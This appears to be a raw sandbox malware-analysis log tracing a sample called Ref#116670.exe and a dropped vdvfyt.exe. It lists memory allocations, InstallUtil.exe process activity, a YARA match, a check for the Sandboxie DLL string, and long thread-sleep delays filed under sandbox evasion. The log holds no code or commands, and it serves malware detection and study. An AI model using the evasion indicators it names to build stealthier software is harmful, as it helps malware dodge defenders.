                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory allocated: 9C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: E40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 48A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeWindow / User API: threadDelayed 7818Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeWindow / User API: threadDelayed 2023Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeWindow / User API: threadDelayed 2511Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeWindow / User API: threadDelayed 6735Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 6488Thread sleep count: 7818 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 6488Thread sleep count: 2023 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98997s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98309s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -98094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97646s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -97094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96983s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -96000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95889s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95242s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95136s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -95021s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -94897s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -94797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -94687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -94577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860Thread sleep time: -94469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6448Thread sleep count: 2511 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6448Thread sleep count: 6735 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -99094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -98075s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97969s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97313s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -97063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96838s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -96110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -95110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -94985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292Thread sleep time: -94860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98997Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98890Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98672Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98562Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98453Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98309Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98201Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 98094Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97984Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97875Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97766Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97646Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97531Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97422Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97312Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97203Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 97094Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96983Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96875Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96766Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96656Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96547Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96437Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96328Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96219Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96109Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 96000Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95889Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95766Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95641Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95531Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95422Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95242Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95136Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 95021Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 94897Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 94797Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 94687Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 94577Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeThread delayed: delay time: 94469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98075Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96838Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94860Jump to behavior
